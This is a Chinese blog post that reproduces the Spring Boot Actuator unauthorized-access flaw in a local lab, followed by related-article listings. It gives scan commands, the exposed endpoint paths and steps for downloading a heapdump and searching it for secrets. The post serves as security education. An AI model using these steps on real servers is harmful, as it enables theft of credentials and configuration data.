Springboot Actuator未授权访问漏洞复现

最新推荐文章于 2024-08-05 11:02:07 发布
最新推荐文章于 2024-08-05 11:02:07 发布
阅读量1w 收藏 20
点赞数 5
分类专栏: 漏洞复现 文章标签: spring boot 乌鸦安全 未授权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csdnmmd/article/details/126088188
版权

更新时间:2022.07.20

微信公众号:乌鸦安全

image.png

1. 漏洞介绍

Spring Boot Actuator 模块提供了生产级别的功能,比如健康检查,审计,指标收集,HTTP 跟踪等,帮助监控和管理Spring Boot 应用。这个模块是一个采集应用内部信息暴露给外部的模块,上述的功能都可以通过HTTP 和 JMX 访问。(来源:https://mp.weixin.qq.com/s/qY-hBSa9u62TNB4-A4RZ9Q
Actuator是Spring Boot提供的应用系统监控的开源框架。在攻防场景里经常会遇到Actuator配置不当的情况,攻击者可以直接下载heapdump堆转储文件,然后通过一些工具来分析heapdump文件,从而可进一步获取敏感信息。(来源:https://mp.weixin.qq.com/s/qY-hBSa9u62TNB4-A4RZ9Q

2. 漏洞环境搭建

搭建环境:windows10 + java1.8
可以直接按照命令进行操作,但是在环境搭建中,可能会遇到一定的问题:

git clone https://github.com/callicoder/spring-boot-actuator-demo.git
cd spring-boot-actuator-demo-master
mvn package
java -jar target/actuator-demo-0.0.1-SNAPSHOT.jar

mvn的安装,可以百度下,比较容易。
执行mvn package
image.png
此时出现报错:
image.png
因为我们使用的没有IDE,所以在这可以用这个方法:
https://blog.csdn.net/qq_39323945/article/details/125110368
image.png

其他的方法可能不是很合适。继续编译,等待一会之后,编译成功:
image.png

然后启动环境:java -jar target/actuator-demo-0.0.1-SNAPSHOT.jar

image.png

访问当前的ip信息:http://10.211.55.5:8080/

image.png

此时环境搭建完成。

3. 漏洞利用

3.1 漏洞发现

一般来说,这种可以通过扫描工具发现漏洞,在这里可以用fscan来试试:
./fscan_darwin -h 10.211.55.5
image.png
在这里可以发现有两个漏洞:

[+] http://10.211.55.5:8080 poc-yaml-springboot-env-unauth spring2
[+] http://10.211.55.5:8080 poc-yaml-spring-actuator-heapdump-file

3.2 利用方法

来源:https://mp.weixin.qq.com/s/qY-hBSa9u62TNB4-A4RZ9Q
Actuator 存在两个版本

1.x版本

/configprops # 显示所有@ConfigurationProperties
/env # 公开 Spring 的ConfigurableEnvironment
/health # 显示应用程序运行状况信息
/httptrace # 显示 HTTP 跟踪信息
/metrics # 显示当前应用程序的监控指标信息。
/mappings # 显示所有@RequestMapping路径的整理列表
/threaddump # 线程转储

/heapdump # 堆转储
/jolokia # JMX-HTTP桥,它提供了一种访问JMX beans的替代方法

2.x版本

/actuator/configprops # 显示所有@ConfigurationProperties
/actuator/env # 公开 Spring 的ConfigurableEnvironment
/actuator/health # 显示应用程序运行状况信息
/actuator/httptrace # 显示 HTTP 跟踪信息
/actuator/metrics # 显示当前应用程序的监控指标信息。
/actuator/mappings # 显示所有@RequestMapping路径的整理列表
/actuator/threaddump # 线程转储
/actuator/heapdump # 堆转储
/actuator/jolokia # JMX-HTTP桥,它提供了一种访问JMX beans的替代方法

3.2 springboot-env-unauth

公开 Spring 的ConfigurableEnvironment
http://10.211.55.5:8080/actuator/env

image.png

http://10.211.55.5:8080/actuator/configprops

image.png

2.3 spring-actuator-heapdump

其实在实战中,最重要的就是heapdump文件,在这里文件里面理论上可以发现很多敏感的数据库之类的信息。
http://10.211.55.5:8080/actuator/heapdump
该文件可以直接下载到本地来,使用专业工具进行解密;
专业工具地址:https://github.com/wyzxxz/heapdump_tool
使用方法:java -jar heapdump_tool.jar heapdump
image.png

在这里选择1,然后搜索关键字:

image.png

当然,在这个环境中,暂时没有发现什么敏感信息,但是在实战里面,有概率是可以发现敏感数据的:

image.png

4. 总结

关于其他的工具来获取明文信息的,可以参考一下链接:
https://mp.weixin.qq.com/s/JKq4WxFKwh7IDIAqTKcTHw

乌鸦安全
关注
专栏目录
springboot授权漏洞(漏洞复现Springboot授权访问及修复)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
04-13 3万+
1、springboot授权漏洞问题描述,ActuatorSpringboot提供的用来对应用系统进行自省和监控的功能模块,借助于Actuator开发者可以很方便地对应用系统某些监控指标进行查看、统计等。 Actuator 的核心是端点 Endpoint,它用来监视应用程序及交互,spring-boot-actuator 中已经内置了非常多的Endpoint(health、info、beans、metrics、httptrace、shutdown等等),同时也允许我们自己扩展自己的Endpoints。
web渗透测试漏洞复现Springboot Actuator授权漏洞复现
HACKONE的博客
03-28 1505
pring Boot ActuatorSpring Boot 框架中非常重要的一个模块,设计用于增强应用程序在生产环境中的可观察性和管理能力。Actuator 提供了一系列内建的端点(Endpoints),这些端点可通过 HTTP 或 JMX 接口暴露应用的健康状况、度量指标、审计信息、环境属性、 Beans 列表等多种内部状态信息。
漏洞复现 - - - Springboot授权访问
weixin_67503304的博客
09-05 2万+
讲解了 Springboot授权访问漏洞的原理,并且利用反弹shell的方式进行了漏洞复现,包括使用了powershell脚本文件
可造成敏感信息泄露!Spring BootActuator信息泄露漏洞三种利用方式总结
WangsuSecurity的博客
08-02 2879
如果没有正确使用Actuator,可能造成信息泄露等严重的安全隐患。其中heapdump作为Actuator组件最为危险的Web端点,因授权访问被恶意人员获取后进行分析,可进一步获取敏感信息。
SpringBoot Actuator授权访问漏洞修复
JHIII的博客
08-25 2万+
目前SpringBoot得框架,越来越广泛,大多数中小型企业,在开发新项目得时候。后端语言使用java得情况下,首选都会使用到SpringBoot。在很多得一些开源得框架中,例如: ruoyi若以,这些。不知道是出于什么原因?我们都会在这些框架中得pom文件中找到的依赖。嘿,这Actuator估计很多人都没有真真实实使用过,但是就会出现在pom文件中;这样导致,在做一些安全漏洞测试的时候,会出现漏洞问题。例如下面:对于这些漏洞,我们开始修复喽!!!
Springboot Actuator授权访问漏洞
最新发布
weixin_53736204的博客
08-05 319
Actuatorspringboot 提供的用来对应用系统进行自省和监控的功能模块,借助于 Actuator 开发者可以很方便地对应用系统某些监控指标进行查看、统计等。在 Actuator启用的情况下,如果没有做好相关权限控制,非法用户可通过访问默认的执行器端点(endpoints)来获取应用系统中的监控信息,从而导致信息泄露甚至服务器被接管的事件发生。Actuatorspringboot 提供的用来对应用系统进行自省和监控的功能模块。步骤二:拼接以下路径查看泄露的数据.
SpringbootActuator授权访问漏洞
潇逗
05-28 5489
ActuatorSpringBoot 提供的用来对应用系统进行自省和监控的功能模块,借助于 Actuator 开发者可以很方便地对应用系统某些监控指标进行查看、统计等。然而,其默认配置会出现接口授权访问,导致部分接口会泄露网站数据库连接信息等配置信息,使用Jolokia库特性甚至可以远程执行任意代码,获取服务器权限。
springboot Actuator授权访问漏洞
qq_45382625的博客
08-29 809
Spring Boot 2.X 中,Actuator 默认开放 health 和 info 两个端点,如果需要配置开放所有端点(配置值为 "*" 代表所有)
Spring Boot Actuator 漏洞复现合集
drnrrwfs的博客
06-12 9679
Spring Boot Actuator 授权访问漏洞在日常的测试中还是能碰到一些的,这种授权在某些情况下是可以达到RCE的效果的,所以还有有一定价值的,下面就是对这一系列漏洞复现。基本上就是参考这篇文章的做的复现:LandGrey/SpringBootVulExploit: SpringBoot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全评估 check list (github.com)Spring Boot Actuator端点通过 JMX 和HTTP 公开暴露给外界访问,大多数时候我们使用基
SpringBootyaml配置注入
学不死就往死里学
08-10 3056
yaml语法学习 配置文件 SpringBoot使用一个全局的配置文件 , 配置文件名称是固定的 application.properties 语法结构 :key=value application.yml 语法结构 :key:空格 value 配置文件的作用 :修改SpringBoot自动配置的默认值,因为SpringBoot在底层都给我们自动配置好了; 比如我们可以在配置文件中修改Tomcat 默认启动的端口号!测试一下! server.port=8081 yaml概述 YAML是 “
Spring Boot Actuator授权访问漏洞
qq_35456400的博客
08-10 1万+
Spring Boot Actuator 端点的授权访问漏洞是一个安全性问题,可能会导致授权的用户访问敏感的应用程序信息。可是并不用太过担心,Spring Boot Actuator 默认暴漏的信息有限,一般情况下并不会暴露敏感数据。注册中心有些功能集成了actuator,如果同时使用eureka和actuator,可以在eureka中点击注册链接查看健康状态信息(/actuator/info)。
Spring Boot Actuator授权访问漏洞利用
热门推荐
Bird&Bird
08-24 5万+
目录一、前言二、端点描述三、漏洞发现四、漏洞利用五、安全措施六、安全建议 一、前言 ActuatorSpring Boot 提供的服务监控和管理中间件。当 Spring Boot 应用程序运行时,它会自动将多个端点注册到路由进程中。而由于对这些端点的错误配置,就有可能导致一些系统信息泄露、XXE、甚至是 RCE 等安全问题。 二、端点描述 官方文档对每个端点的功能进行了描述。 路径 描述 /autoconfig 提供了一份自动配置报告,记录哪些自动配置条件通过了,哪些没通过 /be
Spring Boot Actuator授权访问漏洞和Apache Druid 漏洞修复
songshao の blog
06-24 1万+
Spring Boot Actuator授权访问漏洞 详细描述 ​ Actuatorspringboot 提供的用来对应用系统进行自省和监控的功能模块,借助于 Actuator 开发者可以很方便地对应用系统某些监控指标进行查看、统计等。在 Actuator 启用的情况下,如果没有做好相关权限控制,非法用户可通过访问默认的执行器端点(endpoints)来获取应用系统中的监控信息。 解决办法 1.配置认证 在项目的pom.xml文件下引入spring-boot-starter-security依赖
【原理扫描】Spring Boot Actuator授权访问漏洞
空空
03-24 1万+
问题描述 Actuatorspringboot 提供的用来对应用系统进行自省和监控的功能模块,借助于 Actuator 开发者可以很方便地对应用系统某些监控指标进行查看、统计等。在 Actuator 启用的情况下,如果没有做好相关权限控制,非法用户可通过访问默认的执行器端点(endpoints)来获取应用系统中的监控信息。 漏洞场景: 注:对于Spring 1x,它们在根URL下注册,并且在2x中它们移动到“/actuator/”基本路径。 例如:http://ip:port/actuator/en
SpringBoot Actuator授权访问漏洞 http://25.90.180.34/actuator/env
05-19
SpringBoot ActuatorSpring Boot提供的一个监控和管理Spring Boot应用程序的框架,包括健康检查、审计、统计和HTTP接口等功能。而授权访问漏洞则是指攻击者可以通过某种方式授权访问到应用程序中的敏感信息或者功能。 在你提供的URL中,可以看到该漏洞存在于目标主机的Spring Boot应用程序中。攻击者可以通过向该URL发送一个GET请求,获取应用程序的环境配置信息,包括应用程序使用的所有配置属性、系统环境变量、JVM属性等等。这些信息可能包含敏感数据,例如数据库密码、加密密钥等等,从而导致安全风险。 为了解决这个问题,你可以采取以下措施: 1. 更新Spring Boot Actuator版本:Spring Boot官方已经发布了多个版本的Actuator,其中许多版本已经修复了该漏洞。你可以升级到最新版本的Actuator来避免该漏洞。 2. 配置Actuator安全Spring Boot Actuator提供了安全配置选项,可以限制对Actuator HTTP端点的访问。你可以使用Spring Security等框架来对Actuator进行安全配置,只允许授权用户访问Actuator端点。 3. 禁用Actuator HTTP端点:如果你不需要使用Actuator提供的HTTP端点,可以禁用它们以避免安全风险。在Spring Boot应用程序的配置文件中,设置management.endpoints.web.exposure.exclude属性,将不需要的端点排除在外。例如:`management.endpoints.web.exposure.exclude=env,health,info`。 综上所述,对于SpringBoot Actuator授权访问漏洞,你应该及时采取相应的措施进行修复和防范。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值